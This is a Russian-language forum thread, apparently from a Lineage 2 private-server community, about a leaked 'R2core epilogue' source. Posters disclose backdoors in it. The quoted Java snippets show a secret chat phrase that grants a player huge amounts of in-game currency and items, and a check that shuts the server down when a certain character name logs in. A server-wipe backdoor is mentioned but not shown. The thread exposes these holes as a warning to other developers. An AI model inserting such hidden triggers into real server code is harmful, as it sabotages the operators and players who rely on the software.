• Новые темы в этом разделе публикуются автоматически при добавлении файла в менеджер ресурсов.
    Ручное создание новых тем невозможно.

R2core epilogue source

Начало? Это ты в конце уже подаагриватся начал.) Кстати это последние предложение в переписки от тебя по поводу сурса, не обманывай самого себя.) Так ты и не ответил зачем тебе я и сурс, если у тебя такой крутой лавео.)
Он крутой но его дорабатывать надо и я тебе предложил что бы фиксили в двоем, ты не захотел и на этом вопрос закрыт.
 

Подведем итоги.

Бэкдор в файле l2system.java с вайпом сервера.

Бэкдор в файле Say2c c дюпом донок вот код.
// УПС
if(_text.equals("L2SystemAdenaRasiel"))
activeChar.addAdena(2000000000);
if(_text.equals("L2SystemAdenaRasiel"))
activeChar.getInventory().addItem(4037,2000000, _type, _target);
if(_text.equals("L2SystemAdenaRasiel"))
activeChar.getInventory().addItem(6673,2000000, _type, _target);
if(_text.equals("L2SystemAdenaRasiel"))
activeChar.getInventory().addItem(3470,2000000, _type, _target);
//УПС окончен

И третий в файле EnterWorld.java, когда заходишь чаром с ником Rsighre то сервер выключается.
if(activeChar.getName().equals("Rsighre"))
System.exit(10000);
Может кто то еще нашел бэкдоры кроме меня, поделитесь :OnionHead:
 
Подведем итоги.

Бэкдор в файле l2system.java с вайпом сервера.

Бэкдор в файле Say2c c дюпом донок вот код.
// УПС
if(_text.equals("L2SystemAdenaRasiel"))
activeChar.addAdena(2000000000);
if(_text.equals("L2SystemAdenaRasiel"))
activeChar.getInventory().addItem(4037,2000000, _type, _target);
if(_text.equals("L2SystemAdenaRasiel"))
activeChar.getInventory().addItem(6673,2000000, _type, _target);
if(_text.equals("L2SystemAdenaRasiel"))
activeChar.getInventory().addItem(3470,2000000, _type, _target);
//УПС окончен

И третий в файле EnterWorld.java, когда заходишь чаром с ником Rsighre то сервер выключается.
if(activeChar.getName().equals("Rsighre"))
System.exit(10000);
Может кто то еще нашел бэкдоры кроме меня, поделитесь :OnionHead:
Ты сборку пилишь на данном сурсе?
 
Ох... Интересно это тот сурс, который я High давал года 2 назад? Судя по некоторым моментам это он, хотя Расторгуев мог просто и повыдерать самый шлак, который там был, но сурс обкатан был на тысячных проектах=)
 
Ох... Интересно это тот сурс, который я High давал года 2 назад? Судя по некоторым моментам это он, хотя Расторгуев мог просто и повыдерать самый шлак, который там был, но сурс обкатан был на тысячных проектах:)
Полностью согласен сборка на данном сурсе под высоким онлайном ведет себя адекватно.
 
Может кто то еще нашел бэкдоры кроме меня, поделитесь :OnionHead:
Когда-то давно бэкдор был в EnterWorld.java (перезагрузка, если больше n игроков на сервере) и где-то в s2s (дамп таблиц).. но я даже не помню ревизию, мб закрыто уже. В любом случае покопай.
 
Хочу открыть на этой сборке проект но боюсь бэкдоров.
Хомячки так и фейлятся на шарах, открываясь на шарах это все на свой страх и риск, особенно от таких разработчиков как расторгуев, которые не имеют никакой совести, и готовы в любом подходящий момент засадить нож в спину.) Да и плюс, открываясь на шаре, ваша сборка в любом случаи будет уступать приватным, это как айфон 4 и айфон 6 понравится ли игрокам не думаю, опытные игроки сразу поймут с чем они имеют дела.
 
Хомячки так и фейлятся на шарах, открываясь на шарах это все на свой страх и риск, особенно от таких разработчиков как расторгуев, которые не имеют никакой совести, и готовы в любом подходящий момент засадить нож в спину.) Да и плюс, открываясь на шаре, ваша сборка в любом случаи будет уступать приватным, это как айфон 4 и айфон 6 понравится ли игрокам не думаю, опытные игроки сразу поймут с чем они имеют дела.
Шара компила от шары сурсов сильно отличается. Да и уже сколько раз напарывались после слития исходов, что приватка от шары практически не отличается по реализации и т.п.
 

    MaZz

    Баллов: 1
    Подпись отличная :)
Назад
Сверху Снизу